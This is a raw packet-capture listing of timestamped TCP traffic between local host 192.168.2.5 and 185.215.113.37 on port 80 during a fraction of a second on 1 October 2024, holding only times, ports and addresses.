Oct 1, 2024 16:50:08.007436991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007447004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007448912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.007457018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.007458925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007469893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007479906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007488966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.007489920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007503033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007512093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007523060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007533073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007541895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.007543087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007541895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.007554054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007565975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007575989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007581949 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.007581949 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.007586002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007601976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007613897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007617950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.007623911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007635117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007646084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.007673979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.007702112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.052076101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.052093029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.052103996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.052123070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.052160025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.052170038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.052181959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.052186012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.052191973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.052237034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.052237034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.053062916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.053112984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.053222895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.053232908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.053239107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.053329945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.053343058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.053352118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.053358078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.053366899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.053366899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.053419113 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.053823948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.053904057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.053914070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.053925037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.053934097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.053941011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.053941965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.053992987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.054018974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.054029942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.054039955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.054061890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.054095030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.054919958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.054932117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.054943085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.054971933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.054990053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.055000067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.055010080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.055020094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.055030107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.055041075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.055069923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.055069923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.055109978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.055134058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.055144072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.055152893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.055162907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.055183887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.055196047 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.055229902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.055250883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.055262089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.055300951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.055300951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.056103945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056113958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056166887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.056166887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.056195021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056205034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056214094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056224108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056233883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056318045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.056318045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.056339025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.056416035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056426048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056436062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056446075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056457996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056483030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.056483030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.056540012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.056763887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056773901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056782961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056817055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.056818008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056829929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056838989 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.056925058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056936979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056946993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056956053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.056962967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056972980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.056977034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.056983948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.057013988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.057013988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.057041883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.057054043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.057063103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.057077885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.057081938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.057081938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.057089090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.057099104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.057110071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.057110071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.057133913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.057148933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.057159901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.057168961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.057178020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.057178974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.057195902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.057203054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.057203054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.057241917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.094753027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.094801903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.094814062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.094944954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.094957113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.094959021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.094959021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.094968081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.094978094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.094990015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095000982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095010996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095021009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.095021963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095021009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.095033884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095069885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.095069885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.095232964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095243931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095253944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095263958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095276117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095285892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095293045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.095293045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.095309019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095319033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095330000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095354080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.095354080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.095403910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.095712900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095758915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095769882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095772982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.095782042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095801115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.095834017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.095940113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095951080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095963001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095968008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095980883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.095988989 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.095990896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.096002102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.096035004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.096064091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.096071005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.096074104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.096085072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.096096992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.096126080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.096126080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.096149921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.096160889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.096172094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.096177101 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.096182108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.096193075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.096203089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.096210003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.096210003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.096237898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150089979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150110006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150187969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150199890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150211096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150222063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150233030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150245905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150316954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150326967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150327921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150326967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150326967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150326967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150341034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150351048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150368929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150374889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150378942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150388956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150399923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150407076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150412083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150444031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150444031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150458097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150469065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150479078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150489092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150492907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150492907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150500059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150510073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150521994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150532007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150542974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150548935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150561094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150579929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150583029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150590897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150600910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150604010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150610924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150621891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150631905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150656939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150715113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150726080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150738001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150748968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150749922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150749922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150749922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150759935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150765896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150772095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150777102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150793076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150804996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150810957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150816917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150825024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150826931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150830030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150831938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150834084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150859118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150859118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150877953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150887966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.150890112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.150932074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.151081085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.151082993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.151088953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.151091099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.151098967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.151151896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.151151896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.151161909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.151175022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.151185036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.151211977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.151222944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.151232958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.151240110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.151240110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.151243925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.151253939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.151264906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.151276112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.151283026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.151285887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.151297092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.151304007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.151308060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.151315928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.151319027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.151341915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.151370049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.183567047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.183583975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.183594942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.183603048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.183662891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.183676004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.183734894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.183746099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.183757067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.183768988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.183792114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.183792114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.183792114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.183792114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.183792114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.183815002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.183815956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.183826923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.183835983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.183845997 CEST	80	49704	185.215.113.37	192.168.2.5
